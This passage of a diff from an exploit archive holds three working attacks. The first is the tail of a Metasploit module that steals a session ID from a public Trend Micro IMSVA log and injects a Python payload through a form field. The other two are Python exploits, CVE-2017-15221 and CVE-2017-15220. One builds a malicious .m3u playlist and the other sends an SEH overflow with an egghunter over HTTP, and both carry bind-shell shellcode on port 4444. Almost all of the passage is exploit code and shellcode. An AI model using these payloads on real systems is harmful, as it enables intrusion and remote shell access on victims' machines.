'Payload' =>
|
||||
{
|
||||
'Compat' =>
|
||||
{
|
||||
'ConnectionType' => '-bind'
|
||||
},
|
||||
},
|
||||
'Platform' => ['python'],
|
||||
'Arch' => ARCH_PYTHON,
|
||||
'Targets' => [[ 'Automatic', {}]],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Oct 7 2017",
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The URI of the Trend Micro IMSVA management interface', '/'])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def extract_jsessionid
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'widget', 'repository', 'log', 'diagnostic.log')
|
||||
})
|
||||
if res && res.code == 200 && res.body.include?('JSEEEIONID')
|
||||
res.body.scan(/JSEEEIONID:([A-F0-9]{32})/).flatten.last
|
||||
else
|
||||
nil
|
||||
end
|
||||
end
|
||||
|
||||
def widget_auth(jsessionid)
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'widget', 'index.php'),
|
||||
'cookie' => "CurrentLocale=en-U=en_US; JSESSIONID=#{jsessionid}"
|
||||
})
|
||||
if res && res.code == 200 && res.body.include?('USER_GENERATED_WIDGET_DIR')
|
||||
res.get_cookies
|
||||
else
|
||||
nil
|
||||
end
|
||||
end
|
||||
|
||||
def check
|
||||
# If we've managed to bypass authentication, that means target is most likely vulnerable.
|
||||
jsessionid = extract_jsessionid
|
||||
if jsessionid.nil?
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
auth = widget_auth(jsessionid)
|
||||
if auth.nil?
|
||||
Exploit::CheckCode::Safe
|
||||
else
|
||||
Exploit::CheckCode::Appears
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status('Extracting JSESSIONID from publicly accessible log file')
|
||||
jsessionid = extract_jsessionid
|
||||
if jsessionid.nil?
|
||||
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
|
||||
else
|
||||
print_good("Awesome. JSESSIONID value = #{jsessionid}")
|
||||
end
|
||||
|
||||
print_status('Initiating session with widget framework')
|
||||
cookies = widget_auth(jsessionid)
|
||||
if cookies.nil?
|
||||
fail_with(Failure::NoAccess, "Latest JSESSIONID is expired. Wait for sysadmin to login IMSVA")
|
||||
else
|
||||
print_good('Session with widget framework successfully initiated.')
|
||||
end
|
||||
|
||||
print_status('Trigerring command injection vulnerability')
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'widget', 'proxy_controller.php'),
|
||||
'cookie' => "CurrentLocale=en-US; LogonUser=root; JSESSIONID=#{jsessionid}; #{cookies}",
|
||||
'vars_post' => {
|
||||
'module' => 'modTMCSS',
|
||||
'serverid' => '1',
|
||||
'TOP' => "$(python -c \"#{payload.encoded}\")"
|
||||
}
|
||||
})
|
||||
end
|
||||
end
|
85
platforms/windows/local/42974.py
Executable file
85
platforms/windows/local/42974.py
Executable file
|
@ -0,0 +1,85 @@
|
|||
# Exploit Title: Buffer Overflow via crafted malicious .m3u file
|
||||
|
||||
|
||||
# Exploit Author: Parichay Rai
|
||||
|
||||
# Tested on: XP Service Pack 3
|
||||
|
||||
# CVE : CVE-2017-15221
|
||||
|
||||
Description
|
||||
------------
|
||||
|
||||
A buffer overflow Attack possible due to improper input mechanism
|
||||
|
||||
Proof of Concept
|
||||
----------------
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
#This exploit generates a malicious playlist for the asx to mp3 converter 3.1.3.7.2010.
|
||||
#This is an exploit that work well against a windows XP3 systems!
|
||||
#Successful exploit gives you a bind shell on 4444
|
||||
|
||||
BadChar= "\x00\x0a\x0d\x20"
|
||||
|
||||
# Payload Generation Command: msfpayload windows/shell_bind_tcp EXITFUNC=none R | msfencode -a x86 -b "\x00\x0a\x0d\x20" -f c
|
||||
|
||||
# Successful exploitation opens port 4444 on the victim Machine
|
||||
|
||||
shellcode=("\xd9\xee\xbf\xad\x07\x92\x3e\xd9\x74\x24\xf4\x5e\x2b\xc9" +
|
||||
"\xb1\x56\x31\x7e\x18\x03\x7e\x18\x83\xc6\xa9\xe5\x67\xc2" +
|
||||
"\x59\x60\x87\x3b\x99\x13\x01\xde\xa8\x01\x75\xaa\x98\x95" +
|
||||
"\xfd\xfe\x10\x5d\x53\xeb\xa3\x13\x7c\x1c\x04\x99\x5a\x13" +
|
||||
"\x95\x2f\x63\xff\x55\x31\x1f\x02\x89\x91\x1e\xcd\xdc\xd0" +
|
||||
"\x67\x30\x2e\x80\x30\x3e\x9c\x35\x34\x02\x1c\x37\x9a\x08" +
|
||||
"\x1c\x4f\x9f\xcf\xe8\xe5\x9e\x1f\x40\x71\xe8\x87\xeb\xdd" +
|
||||
"\xc9\xb6\x38\x3e\x35\xf0\x35\xf5\xcd\x03\x9f\xc7\x2e\x32" +
|
||||
"\xdf\x84\x10\xfa\xd2\xd5\x55\x3d\x0c\xa0\xad\x3d\xb1\xb3" +
|
||||
"\x75\x3f\x6d\x31\x68\xe7\xe6\xe1\x48\x19\x2b\x77\x1a\x15" +
|
||||
"\x80\xf3\x44\x3a\x17\xd7\xfe\x46\x9c\xd6\xd0\xce\xe6\xfc" +
|
||||
"\xf4\x8b\xbd\x9d\xad\x71\x10\xa1\xae\xde\xcd\x07\xa4\xcd" +
|
||||
"\x1a\x31\xe7\x99\xef\x0c\x18\x5a\x67\x06\x6b\x68\x28\xbc" +
|
||||
"\xe3\xc0\xa1\x1a\xf3\x27\x98\xdb\x6b\xd6\x22\x1c\xa5\x1d" +
|
||||
"\x76\x4c\xdd\xb4\xf6\x07\x1d\x38\x23\x87\x4d\x96\x9b\x68" +
|
||||
"\x3e\x56\x4b\x01\x54\x59\xb4\x31\x57\xb3\xc3\x75\x99\xe7" +
|
||||
"\x80\x11\xd8\x17\x37\xbe\x55\xf1\x5d\x2e\x30\xa9\xc9\x8c" +
|
||||
"\x67\x62\x6e\xee\x4d\xde\x27\x78\xd9\x08\xff\x87\xda\x1e" +
|
||||
"\xac\x24\x72\xc9\x26\x27\x47\xe8\x39\x62\xef\x63\x02\xe5" +
|
||||
"\x65\x1a\xc1\x97\x7a\x37\xb1\x34\xe8\xdc\x41\x32\x11\x4b" +
|
||||
"\x16\x13\xe7\x82\xf2\x89\x5e\x3d\xe0\x53\x06\x06\xa0\x8f" +
|
||||
"\xfb\x89\x29\x5d\x47\xae\x39\x9b\x48\xea\x6d\x73\x1f\xa4" +
|
||||
"\xdb\x35\xc9\x06\xb5\xef\xa6\xc0\x51\x69\x85\xd2\x27\x76" +
|
||||
"\xc0\xa4\xc7\xc7\xbd\xf0\xf8\xe8\x29\xf5\x81\x14\xca\xfa" +
|
||||
"\x58\x9d\xa0\xc0\x80\xbf\xdc\x6c\xd1\xfd\x80\x8e\x0c\xc1" +
|
||||
"\xbc\x0c\xa4\xba\x3a\x0c\xcd\xbf\x07\x8a\x3e\xb2\x18\x7f" +
|
||||
"\x40\x61\x18\xaa")
|
||||
|
||||
buffer="http://"
|
||||
buffer+="A"*17417
|
||||
buffer+="\x53\x93\x42\x7e" #(overwrites EIP in windows XP service pack 3 with the address of user32.dll)
|
||||
buffer+="\x90"*10 #NOPs
|
||||
buffer+=shellcode
|
||||
buffer+="\x90"*10 #NOPs
|
||||
f=open("exploit.m3u","w")
|
||||
f.write(buffer);
|
||||
f.close()
|
||||
|
||||
----------------------
|
||||
Affected Targets
|
||||
---------------------
|
||||
|
||||
ASX to MP3 version 3.1.3.7 and May be less
|
||||
|
||||
|
||||
Solution
|
||||
---------------
|
||||
|
||||
Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing "junk" characters, etc.
|
||||
|
||||
|
||||
Credits
|
||||
----------
|
||||
|
||||
Offensive Security
|
||||
Rebellious Ceaser
|
103
platforms/windows/remote/42973.py
Executable file
103
platforms/windows/remote/42973.py
Executable file
|
@ -0,0 +1,103 @@
|
|||
#!/usr/bin/env python
|
||||
# Exploit Title : VX Search Enterprise v10.1.12 Remote Buffer Overflow
|
||||
# Exploit Author : Revnic Vasile
|
||||
# Email : revnic[at]gmail[dot]com
|
||||
# Date : 09-10-2017
|
||||
# Vendor Homepage : http://www.flexense.com/
|
||||
# Software Link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.1.12.exe
|
||||
# Version : 10.1.12
|
||||
# Tested on : Windows 7 x86 Pro SP1
|
||||
# Category : Windows Remote Exploit
|
||||
# CVE : CVE-2017-15220
|
||||
|
||||
|
||||
import socket
|
||||
import os
|
||||
import sys
|
||||
import struct
|
||||
|
||||
|
||||
# msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUN=none -e x86/alpha_mixed -f c
|
||||
shellcode = ("\x89\xe5\xdb\xd3\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
|
||||
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
|
||||
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
|
||||
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
|
||||
"\x39\x6c\x68\x68\x6f\x72\x55\x50\x77\x70\x53\x30\x43\x50\x4d"
|
||||
"\x59\x79\x75\x66\x51\x69\x50\x45\x34\x6c\x4b\x32\x70\x70\x30"
|
||||
"\x4c\x4b\x32\x72\x64\x4c\x6e\x6b\x56\x32\x66\x74\x6e\x6b\x72"
|
||||
"\x52\x75\x78\x36\x6f\x4e\x57\x33\x7a\x57\x56\x54\x71\x4b\x4f"
|
||||
"\x4e\x4c\x65\x6c\x65\x31\x73\x4c\x44\x42\x56\x4c\x75\x70\x5a"
|
||||
"\x61\x38\x4f\x36\x6d\x63\x31\x4f\x37\x5a\x42\x58\x72\x63\x62"
|
||||
"\x70\x57\x6e\x6b\x42\x72\x44\x50\x4c\x4b\x73\x7a\x45\x6c\x6e"
|
||||
"\x6b\x72\x6c\x44\x51\x72\x58\x78\x63\x33\x78\x35\x51\x48\x51"
|
||||
"\x42\x71\x6c\x4b\x43\x69\x37\x50\x77\x71\x5a\x73\x4c\x4b\x67"
|
||||
"\x39\x77\x68\x5a\x43\x66\x5a\x53\x79\x4e\x6b\x74\x74\x4c\x4b"
|
||||
"\x43\x31\x39\x46\x70\x31\x6b\x4f\x6e\x4c\x39\x51\x78\x4f\x46"
|
||||
"\x6d\x53\x31\x38\x47\x55\x68\x39\x70\x72\x55\x7a\x56\x33\x33"
|
||||
"\x33\x4d\x4b\x48\x35\x6b\x61\x6d\x74\x64\x50\x75\x4a\x44\x31"
|
||||
"\x48\x4c\x4b\x46\x38\x56\x44\x73\x31\x69\x43\x50\x66\x4c\x4b"
|
||||
"\x46\x6c\x72\x6b\x4c\x4b\x73\x68\x67\x6c\x43\x31\x4b\x63\x4c"
|
||||
"\x4b\x46\x64\x4e\x6b\x76\x61\x48\x50\x4c\x49\x71\x54\x34\x64"
|
||||
"\x35\x74\x63\x6b\x71\x4b\x71\x71\x36\x39\x31\x4a\x46\x31\x39"
|
||||
"\x6f\x6d\x30\x43\x6f\x73\x6f\x32\x7a\x6e\x6b\x74\x52\x68\x6b"
|
||||
"\x6c\x4d\x43\x6d\x62\x48\x44\x73\x44\x72\x77\x70\x65\x50\x33"
|
||||
"\x58\x73\x47\x30\x73\x56\x52\x43\x6f\x31\x44\x61\x78\x62\x6c"
|
||||
"\x53\x47\x74\x66\x35\x57\x59\x6f\x4a\x75\x6f\x48\x4e\x70\x45"
|
||||
"\x51\x47\x70\x57\x70\x65\x79\x6f\x34\x71\x44\x62\x70\x43\x58"
|
||||
"\x46\x49\x4f\x70\x30\x6b\x53\x30\x59\x6f\x6a\x75\x72\x4a\x33"
|
||||
"\x38\x53\x69\x46\x30\x4b\x52\x69\x6d\x73\x70\x32\x70\x51\x50"
|
||||
"\x32\x70\x31\x78\x4a\x4a\x36\x6f\x49\x4f\x4b\x50\x39\x6f\x49"
|
||||
"\x45\x4e\x77\x31\x78\x75\x52\x75\x50\x57\x61\x53\x6c\x6b\x39"
|
||||
"\x7a\x46\x63\x5a\x54\x50\x71\x46\x32\x77\x43\x58\x6b\x72\x49"
|
||||
"\x4b\x76\x57\x53\x57\x39\x6f\x38\x55\x46\x37\x42\x48\x38\x37"
|
||||
"\x48\x69\x57\x48\x49\x6f\x59\x6f\x58\x55\x73\x67\x75\x38\x44"
|
||||
"\x34\x68\x6c\x57\x4b\x69\x71\x59\x6f\x7a\x75\x51\x47\x6e\x77"
|
||||
"\x50\x68\x50\x75\x72\x4e\x52\x6d\x51\x71\x6b\x4f\x4a\x75\x31"
|
||||
"\x78\x52\x43\x70\x6d\x52\x44\x67\x70\x4f\x79\x78\x63\x71\x47"
|
||||
"\x43\x67\x33\x67\x75\x61\x68\x76\x62\x4a\x55\x42\x70\x59\x56"
|
||||
"\x36\x7a\x42\x59\x6d\x53\x56\x38\x47\x32\x64\x61\x34\x45\x6c"
|
||||
"\x76\x61\x35\x51\x6c\x4d\x57\x34\x34\x64\x74\x50\x6b\x76\x43"
|
||||
"\x30\x50\x44\x30\x54\x52\x70\x50\x56\x53\x66\x53\x66\x42\x66"
|
||||
"\x46\x36\x70\x4e\x30\x56\x53\x66\x72\x73\x30\x56\x31\x78\x33"
|
||||
"\x49\x38\x4c\x65\x6f\x4d\x56\x4b\x4f\x59\x45\x4b\x39\x79\x70"
|
||||
"\x32\x6e\x73\x66\x33\x76\x6b\x4f\x30\x30\x31\x78\x65\x58\x6f"
|
||||
"\x77\x67\x6d\x31\x70\x79\x6f\x38\x55\x6d\x6b\x6a\x50\x4e\x55"
|
||||
"\x69\x32\x30\x56\x33\x58\x4c\x66\x4e\x75\x4d\x6d\x4d\x4d\x59"
|
||||
"\x6f\x38\x55\x37\x4c\x57\x76\x33\x4c\x54\x4a\x6d\x50\x6b\x4b"
|
||||
"\x4b\x50\x32\x55\x53\x35\x4d\x6b\x63\x77\x57\x63\x73\x42\x32"
|
||||
"\x4f\x52\x4a\x37\x70\x51\x43\x4b\x4f\x58\x55\x41\x41")
|
||||
|
||||
|
||||
buf_totlen = 5000
|
||||
dist_seh = 2492
|
||||
nseh = "\xeb\x06AA"
|
||||
seh = 0x1011369e
|
||||
nops = "\x90" * 10
|
||||
|
||||
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
|
||||
"\x77\x30\x30\x74"
|
||||
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
|
||||
|
||||
egg = "w00tw00t"
|
||||
|
||||
payload = ""
|
||||
payload += "A"*(dist_seh - len(payload))
|
||||
payload += nseh
|
||||
payload += struct.pack("<I", seh)
|
||||
payload += nops
|
||||
payload += egghunter
|
||||
payload += egg
|
||||
payload += shellcode
|
||||
payload += "D"*(buf_totlen - len(payload))
|
||||
|
||||
buf = "POST /../%s HTTP/1.1\r\n" %payload
|
||||
buf += "Host: 10.10.10.10\r\n"
|
||||
buf += "User-Agent: Mozilla/5.0\r\n"
|
||||
buf += "Connection: close\r\n"
|
||||
buf += "\r\n"
|
||||
|
||||
print "Sending the payload!"
|
||||
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
|
||||
expl.connect(("10.10.10.10", 80))
|
||||
expl.send(buf)
|
||||
expl.close()
|
Loading…
Add table
Reference in a new issue